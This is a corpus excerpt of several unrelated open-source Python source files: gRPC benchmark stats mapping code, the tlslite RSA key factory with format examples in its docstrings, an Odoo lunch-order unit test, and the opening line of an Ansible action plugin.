core_stats, "pollset_kicked_again")
stats[
"core_pollset_kick_wakeup_fd"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick_wakeup_fd")
stats[
"core_pollset_kick_wakeup_cv"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick_wakeup_cv")
stats[
"core_pollset_kick_own_thread"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick_own_thread")
stats["core_syscall_epoll_ctl"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_epoll_ctl")
stats[
"core_pollset_fd_cache_hits"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_fd_cache_hits")
stats[
"core_histogram_slow_lookups"] = massage_qps_stats_helpers.counter(
core_stats, "histogram_slow_lookups")
stats["core_syscall_write"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_write")
stats["core_syscall_read"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_read")
stats[
"core_tcp_backup_pollers_created"] = massage_qps_stats_helpers.counter(
core_stats, "tcp_backup_pollers_created")
stats[
"core_tcp_backup_poller_polls"] = massage_qps_stats_helpers.counter(
core_stats, "tcp_backup_poller_polls")
stats["core_http2_op_batches"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_batches")
stats["core_http2_op_cancel"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_cancel")
stats[
"core_http2_op_send_initial_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_send_initial_metadata")
stats[
"core_http2_op_send_message"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_send_message")
stats[
"core_http2_op_send_trailing_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_send_trailing_metadata")
stats[
"core_http2_op_recv_initial_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_recv_initial_metadata")
stats[
"core_http2_op_recv_message"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_recv_message")
stats[
"core_http2_op_recv_trailing_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_recv_trailing_metadata")
stats[
"core_http2_settings_writes"] = massage_qps_stats_helpers.counter(
core_stats, "http2_settings_writes")
stats["core_http2_pings_sent"] = massage_qps_stats_helpers.counter(
core_stats, "http2_pings_sent")
stats[
"core_http2_writes_begun"] = massage_qps_stats_helpers.counter(
core_stats, "http2_writes_begun")
stats[
"core_http2_writes_offloaded"] = massage_qps_stats_helpers.counter(
core_stats, "http2_writes_offloaded")
stats[
"core_http2_writes_continued"] = massage_qps_stats_helpers.counter(
core_stats, "http2_writes_continued")
stats[
"core_http2_partial_writes"] = massage_qps_stats_helpers.counter(
core_stats, "http2_partial_writes")
stats[
"core_http2_initiate_write_due_to_initial_write"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_initial_write")
stats[
"core_http2_initiate_write_due_to_start_new_stream"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_start_new_stream")
stats[
"core_http2_initiate_write_due_to_send_message"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_send_message")
stats[
"core_http2_initiate_write_due_to_send_initial_metadata"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_send_initial_metadata")
stats[
"core_http2_initiate_write_due_to_send_trailing_metadata"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_send_trailing_metadata")
stats[
"core_http2_initiate_write_due_to_retry_send_ping"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_retry_send_ping")
stats[
"core_http2_initiate_write_due_to_continue_pings"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_continue_pings")
stats[
"core_http2_initiate_write_due_to_goaway_sent"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_goaway_sent")
stats[
"core_http2_initiate_write_due_to_rst_stream"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_rst_stream")
stats[
"core_http2_initiate_write_due_to_close_from_api"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_close_from_api")
stats[
"core_http2_initiate_write_due_to_stream_flow_control"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_stream_flow_control")
stats[
"core_http2_initiate_write_due_to_transport_flow_control"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_transport_flow_control")
stats[
"core_http2_initiate_write_due_to_send_settings"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_send_settings")
stats[
"core_http2_initiate_write_due_to_bdp_estimator_ping"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_bdp_estimator_ping")
stats[
"core_http2_initiate_write_due_to_flow_control_unstalled_by_setting"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_flow_control_unstalled_by_setting"
)
stats[
"core_http2_initiate_write_due_to_flow_control_unstalled_by_update"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_flow_control_unstalled_by_update"
)
stats[
"core_http2_initiate_write_due_to_application_ping"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_application_ping")
stats[
"core_http2_initiate_write_due_to_keepalive_ping"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_keepalive_ping")
stats[
"core_http2_initiate_write_due_to_transport_flow_control_unstalled"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_transport_flow_control_unstalled"
)
stats[
"core_http2_initiate_write_due_to_ping_response"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_ping_response")
stats[
"core_http2_initiate_write_due_to_force_rst_stream"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_force_rst_stream")
stats[
"core_http2_spurious_writes_begun"] = massage_qps_stats_helpers.counter(
core_stats, "http2_spurious_writes_begun")
stats[
"core_hpack_recv_indexed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_indexed")
stats[
"core_hpack_recv_lithdr_incidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_incidx")
stats[
"core_hpack_recv_lithdr_incidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_incidx_v")
stats[
"core_hpack_recv_lithdr_notidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_notidx")
stats[
"core_hpack_recv_lithdr_notidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_notidx_v")
stats[
"core_hpack_recv_lithdr_nvridx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_nvridx")
stats[
"core_hpack_recv_lithdr_nvridx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_nvridx_v")
stats[
"core_hpack_recv_uncompressed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_uncompressed")
stats[
"core_hpack_recv_huffman"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_huffman")
stats["core_hpack_recv_binary"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_binary")
stats[
"core_hpack_recv_binary_base64"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_binary_base64")
stats[
"core_hpack_send_indexed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_indexed")
stats[
"core_hpack_send_lithdr_incidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_incidx")
stats[
"core_hpack_send_lithdr_incidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_incidx_v")
stats[
"core_hpack_send_lithdr_notidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_notidx")
stats[
"core_hpack_send_lithdr_notidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_notidx_v")
stats[
"core_hpack_send_lithdr_nvridx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_nvridx")
stats[
"core_hpack_send_lithdr_nvridx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_nvridx_v")
stats[
"core_hpack_send_uncompressed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_uncompressed")
stats[
"core_hpack_send_huffman"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_huffman")
stats["core_hpack_send_binary"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_binary")
stats[
"core_hpack_send_binary_base64"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_binary_base64")
stats[
"core_combiner_locks_initiated"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_initiated")
stats[
"core_combiner_locks_scheduled_items"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_scheduled_items")
stats[
"core_combiner_locks_scheduled_final_items"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_scheduled_final_items")
stats[
"core_combiner_locks_offloaded"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_offloaded")
stats[
"core_call_combiner_locks_initiated"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_locks_initiated")
stats[
"core_call_combiner_locks_scheduled_items"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_locks_scheduled_items")
stats[
"core_call_combiner_set_notify_on_cancel"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_set_notify_on_cancel")
stats[
"core_call_combiner_cancelled"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_cancelled")
stats[
"core_executor_scheduled_short_items"] = massage_qps_stats_helpers.counter(
core_stats, "executor_scheduled_short_items")
stats[
"core_executor_scheduled_long_items"] = massage_qps_stats_helpers.counter(
core_stats, "executor_scheduled_long_items")
stats[
"core_executor_scheduled_to_self"] = massage_qps_stats_helpers.counter(
core_stats, "executor_scheduled_to_self")
stats[
"core_executor_wakeup_initiated"] = massage_qps_stats_helpers.counter(
core_stats, "executor_wakeup_initiated")
stats[
"core_executor_queue_drained"] = massage_qps_stats_helpers.counter(
core_stats, "executor_queue_drained")
stats[
"core_executor_push_retries"] = massage_qps_stats_helpers.counter(
core_stats, "executor_push_retries")
stats[
"core_server_requested_calls"] = massage_qps_stats_helpers.counter(
core_stats, "server_requested_calls")
stats[
"core_server_slowpath_requests_queued"] = massage_qps_stats_helpers.counter(
core_stats, "server_slowpath_requests_queued")
stats[
"core_cq_ev_queue_trylock_failures"] = massage_qps_stats_helpers.counter(
core_stats, "cq_ev_queue_trylock_failures")
stats[
"core_cq_ev_queue_trylock_successes"] = massage_qps_stats_helpers.counter(
core_stats, "cq_ev_queue_trylock_successes")
stats[
"core_cq_ev_queue_transient_pop_failures"] = massage_qps_stats_helpers.counter(
core_stats, "cq_ev_queue_transient_pop_failures")
h = massage_qps_stats_helpers.histogram(core_stats,
"call_initial_size")
stats["core_call_initial_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_call_initial_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_call_initial_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_call_initial_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_call_initial_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"poll_events_returned")
stats["core_poll_events_returned"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_poll_events_returned_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_poll_events_returned_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_poll_events_returned_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_poll_events_returned_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_write_size")
stats["core_tcp_write_size"] = ",".join("%f" % x for x in h.buckets)
stats["core_tcp_write_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_write_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_write_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_write_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_write_iov_size")
stats["core_tcp_write_iov_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_tcp_write_iov_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_write_iov_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_write_iov_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_write_iov_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats, "tcp_read_size")
stats["core_tcp_read_size"] = ",".join("%f" % x for x in h.buckets)
stats["core_tcp_read_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_read_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_read_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_read_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_read_offer")
stats["core_tcp_read_offer"] = ",".join("%f" % x for x in h.buckets)
stats["core_tcp_read_offer_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_read_offer_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_read_offer_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_read_offer_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_read_offer_iov_size")
stats["core_tcp_read_offer_iov_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_tcp_read_offer_iov_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_read_offer_iov_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_read_offer_iov_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_read_offer_iov_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"http2_send_message_size")
stats["core_http2_send_message_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_message_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_message_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_message_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_message_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_initial_metadata_per_write")
stats["core_http2_send_initial_metadata_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_initial_metadata_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_initial_metadata_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_initial_metadata_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_initial_metadata_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_message_per_write")
stats["core_http2_send_message_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_message_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_message_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_message_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_message_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_trailing_metadata_per_write")
stats["core_http2_send_trailing_metadata_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats[
"core_http2_send_trailing_metadata_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_trailing_metadata_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_trailing_metadata_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_trailing_metadata_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_flowctl_per_write")
stats["core_http2_send_flowctl_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_flowctl_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_flowctl_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_flowctl_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_flowctl_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"server_cqs_checked")
stats["core_server_cqs_checked"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_server_cqs_checked_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_server_cqs_checked_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_server_cqs_checked_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_server_cqs_checked_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
|
ThinkingBridge/platform_external_chromium_org
|
refs/heads/kitkat
|
third_party/tlslite/tlslite/utils/keyfactory.py
|
361
|
"""Factory functions for asymmetric cryptography.
@sort: generateRSAKey, parseXMLKey, parsePEMKey, parseAsPublicKey,
parseAsPrivateKey
"""
from compat import *
from RSAKey import RSAKey
from Python_RSAKey import Python_RSAKey
import cryptomath
if cryptomath.m2cryptoLoaded:
from OpenSSL_RSAKey import OpenSSL_RSAKey
if cryptomath.pycryptoLoaded:
from PyCrypto_RSAKey import PyCrypto_RSAKey
# **************************************************************************
# Factory Functions for RSA Keys
# **************************************************************************
def generateRSAKey(bits, implementations=["openssl", "python"]):
"""Generate an RSA key with the specified bit length.
@type bits: int
@param bits: Desired bit length of the new key's modulus.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: A new RSA private key.
"""
for implementation in implementations:
if implementation == "openssl" and cryptomath.m2cryptoLoaded:
return OpenSSL_RSAKey.generate(bits)
elif implementation == "python":
return Python_RSAKey.generate(bits)
raise ValueError("No acceptable implementations")
def parseXMLKey(s, private=False, public=False, implementations=["python"]):
"""Parse an XML-format key.
The XML format used here is specific to tlslite and cryptoIDlib. The
format can store the public component of a key, or the public and
private components. For example::
<publicKey xmlns="http://trevp.net/rsa">
<n>4a5yzB8oGNlHo866CAspAC47M4Fvx58zwK8pou...
<e>Aw==</e>
</publicKey>
<privateKey xmlns="http://trevp.net/rsa">
<n>4a5yzB8oGNlHo866CAspAC47M4Fvx58zwK8pou...
<e>Aw==</e>
<d>JZ0TIgUxWXmL8KJ0VqyG1V0J3ern9pqIoB0xmy...
<p>5PreIj6z6ldIGL1V4+1C36dQFHNCQHJvW52GXc...
<q>/E/wDit8YXPCxx126zTq2ilQ3IcW54NJYyNjiZ...
<dP>mKc+wX8inDowEH45Qp4slRo1YveBgExKPROu6...
<dQ>qDVKtBz9lk0shL5PR3ickXDgkwS576zbl2ztB...
<qInv>j6E8EA7dNsTImaXexAmLA1DoeArsYeFAInr...
</privateKey>
@type s: str
@param s: A string containing an XML public or private key.
@type private: bool
@param private: If True, a L{SyntaxError} will be raised if the private
key component is not present.
@type public: bool
@param public: If True, the private key component (if present) will be
discarded, so this function will always return a public key.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA key.
@raise SyntaxError: If the key is not properly formatted.
"""
for implementation in implementations:
if implementation == "python":
key = Python_RSAKey.parseXML(s)
break
else:
raise ValueError("No acceptable implementations")
return _parseKeyHelper(key, private, public)
#Parse as an OpenSSL or Python key
def parsePEMKey(s, private=False, public=False, passwordCallback=None,
implementations=["openssl", "python"]):
"""Parse a PEM-format key.
The PEM format is used by OpenSSL and other tools. The
format is typically used to store both the public and private
components of a key. For example::
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDYscuoMzsGmW0pAYsmyHltxB2TdwHS0dImfjCMfaSDkfLdZY5+
dOWORVns9etWnr194mSGA1F0Pls/VJW8+cX9+3vtJV8zSdANPYUoQf0TP7VlJxkH
dSRkUbEoz5bAAs/+970uos7n7iXQIni+3erUTdYEk2iWnMBjTljfgbK/dQIDAQAB
AoGAJHoJZk75aKr7DSQNYIHuruOMdv5ZeDuJvKERWxTrVJqE32/xBKh42/IgqRrc
esBN9ZregRCd7YtxoL+EVUNWaJNVx2mNmezEznrc9zhcYUrgeaVdFO2yBF1889zO
gCOVwrO8uDgeyj6IKa25H6c1N13ih/o7ZzEgWbGG+ylU1yECQQDv4ZSJ4EjSh/Fl
aHdz3wbBa/HKGTjC8iRy476Cyg2Fm8MZUe9Yy3udOrb5ZnS2MTpIXt5AF3h2TfYV
VoFXIorjAkEA50FcJmzT8sNMrPaV8vn+9W2Lu4U7C+K/O2g1iXMaZms5PC5zV5aV
CKXZWUX1fq2RaOzlbQrpgiolhXpeh8FjxwJBAOFHzSQfSsTNfttp3KUpU0LbiVvv
i+spVSnA0O4rq79KpVNmK44Mq67hsW1P11QzrzTAQ6GVaUBRv0YS061td1kCQHnP
wtN2tboFR6lABkJDjxoGRvlSt4SOPr7zKGgrWjeiuTZLHXSAnCY+/hr5L9Q3ZwXG
6x6iBdgLjVIe4BZQNtcCQQDXGv/gWinCNTN3MPWfTW/RGzuMYVmyBFais0/VrgdH
h1dLpztmpQqfyH/zrBXQ9qL/zR4ojS6XYneO/U18WpEe
-----END RSA PRIVATE KEY-----
To generate a key like this with OpenSSL, run::
openssl genrsa 2048 > key.pem
This format also supports password-encrypted private keys. TLS
Lite can only handle password-encrypted private keys when OpenSSL
and M2Crypto are installed. In this case, passwordCallback will be
invoked to query the user for the password.
@type s: str
@param s: A string containing a PEM-encoded public or private key.
@type private: bool
@param private: If True, a L{SyntaxError} will be raised if the
private key component is not present.
@type public: bool
@param public: If True, the private key component (if present) will
be discarded, so this function will always return a public key.
@type passwordCallback: callable
@param passwordCallback: This function will be called, with no
arguments, if the PEM-encoded private key is password-encrypted.
The callback should return the password string. If the password is
incorrect, SyntaxError will be raised. If no callback is passed
and the key is password-encrypted, a prompt will be displayed at
the console.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA key.
@raise SyntaxError: If the key is not properly formatted.
"""
for implementation in implementations:
if implementation == "openssl" and cryptomath.m2cryptoLoaded:
key = OpenSSL_RSAKey.parse(s, passwordCallback)
break
elif implementation == "python":
key = Python_RSAKey.parsePEM(s)
break
else:
raise ValueError("No acceptable implementations")
return _parseKeyHelper(key, private, public)
def _parseKeyHelper(key, private, public):
if private:
if not key.hasPrivateKey():
raise SyntaxError("Not a private key!")
if public:
return _createPublicKey(key)
if private:
if hasattr(key, "d"):
return _createPrivateKey(key)
else:
return key
return key
def parseAsPublicKey(s):
"""Parse an XML or PEM-formatted public key.
@type s: str
@param s: A string containing an XML or PEM-encoded public or private key.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA public key.
@raise SyntaxError: If the key is not properly formatted.
"""
try:
return parsePEMKey(s, public=True)
except:
return parseXMLKey(s, public=True)
def parsePrivateKey(s):
"""Parse an XML or PEM-formatted private key.
@type s: str
@param s: A string containing an XML or PEM-encoded private key.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
@return: An RSA private key.
@raise SyntaxError: If the key is not properly formatted.
"""
try:
return parsePEMKey(s, private=True)
except:
return parseXMLKey(s, private=True)
def _createPublicKey(key):
"""
Create a new public key. Discard any private component,
and return the most efficient key possible.
"""
if not isinstance(key, RSAKey):
raise AssertionError()
return _createPublicRSAKey(key.n, key.e)
def _createPrivateKey(key):
"""
Create a new private key. Return the most efficient key possible.
"""
if not isinstance(key, RSAKey):
raise AssertionError()
if not key.hasPrivateKey():
raise AssertionError()
return _createPrivateRSAKey(key.n, key.e, key.d, key.p, key.q, key.dP,
key.dQ, key.qInv)
def _createPublicRSAKey(n, e, implementations = ["openssl", "pycrypto",
"python"]):
for implementation in implementations:
if implementation == "openssl" and cryptomath.m2cryptoLoaded:
return OpenSSL_RSAKey(n, e)
elif implementation == "pycrypto" and cryptomath.pycryptoLoaded:
return PyCrypto_RSAKey(n, e)
elif implementation == "python":
return Python_RSAKey(n, e)
raise ValueError("No acceptable implementations")
def _createPrivateRSAKey(n, e, d, p, q, dP, dQ, qInv,
implementations = ["pycrypto", "python"]):
for implementation in implementations:
if implementation == "pycrypto" and cryptomath.pycryptoLoaded:
return PyCrypto_RSAKey(n, e, d, p, q, dP, dQ, qInv)
elif implementation == "python":
return Python_RSAKey(n, e, d, p, q, dP, dQ, qInv)
raise ValueError("No acceptable implementations")
|
buguelos/odoo
|
refs/heads/master
|
addons/lunch/tests/test_lunch.py
|
345
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.tests import common
class Test_Lunch(common.TransactionCase):
def setUp(self):
"""*****setUp*****"""
super(Test_Lunch, self).setUp()
cr, uid = self.cr, self.uid
self.res_users = self.registry('res.users')
self.lunch_order = self.registry('lunch.order')
self.lunch_order_line = self.registry('lunch.order.line')
self.lunch_cashmove = self.registry('lunch.cashmove')
self.lunch_product = self.registry('lunch.product')
self.lunch_alert = self.registry('lunch.alert')
self.lunch_product_category = self.registry('lunch.product.category')
self.demo_id = self.res_users.search(cr, uid, [('name', '=', 'Demo User')])
self.product_bolognese_ref = self.registry('ir.model.data').get_object_reference(cr, uid, 'lunch', 'product_Bolognese')
self.product_Bolognese_id = self.product_bolognese_ref and self.product_bolognese_ref[1] or False
self.new_id_order = self.lunch_order.create(cr,uid,{
'user_id': self.demo_id[0],
'order_line_ids':'[]',
},context=None)
self.new_id_order_line = self.lunch_order_line.create(cr,uid,{
'order_id':self.new_id_order,
'product_id':self.product_Bolognese_id,
'note': '+Emmental',
'cashmove': [],
'price': self.lunch_product.browse(cr,uid,self.product_Bolognese_id,context=None).price,
})
def test_00_lunch_order(self):
"""Change the state of an order line from 'new' to 'ordered'. Check that there are no cashmove linked to that order line"""
cr, uid = self.cr, self.uid
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#we check that our order_line is a 'new' one and that there are no cashmove linked to that order_line:
self.assertEqual(self.order_one.state,'new')
self.assertEqual(list(self.order_one.cashmove), [])
#we order that orderline so it's state will be 'ordered'
self.order_one.order()
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#we check that our order_line is a 'ordered' one and that there are no cashmove linked to that order_line:
self.assertEqual(self.order_one.state,'ordered')
self.assertEqual(list(self.order_one.cashmove), [])
def test_01_lunch_order(self):
"""Change the state of an order line from 'new' to 'ordered' then to 'confirmed'. Check that there is a cashmove linked to the order line"""
cr, uid = self.cr, self.uid
self.test_00_lunch_order()
#We receive the order so we confirm the order line so it's state will be 'confirmed'
#A cashmove will be created and we will test that the cashmove amount equals the order line price
self.order_one.confirm()
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#we check that our order_line is a 'confirmed' one and that there are a cashmove linked to that order_line with an amount equals to the order line price:
self.assertEqual(self.order_one.state,'confirmed')
self.assertTrue(self.order_one.cashmove)
self.assertTrue(self.order_one.cashmove[0].amount==-self.order_one.price)
def test_02_lunch_order(self):
"""Change the state of an order line from 'confirmed' to 'cancelled' and check that the cashmove linked to that order line will be deleted"""
cr, uid = self.cr, self.uid
self.test_01_lunch_order()
#We have a confirmed order with its associate cashmove
#We execute the cancel function
self.order_one.cancel()
self.order_one = self.lunch_order_line.browse(cr,uid,self.new_id_order_line,context=None)
#We check that the state is cancelled and that the cashmove has been deleted
self.assertEqual(self.order_one.state,'cancelled')
self.assertFalse(self.order_one.cashmove)
|
agaffney/ansible
|
refs/heads/devel
|
test/support/network-integration/collections/ansible_collections/ansible/netcommon/plugins/action/net_base.py
|
47
|
# Copyright: (c) 2015, Ansible Inc,
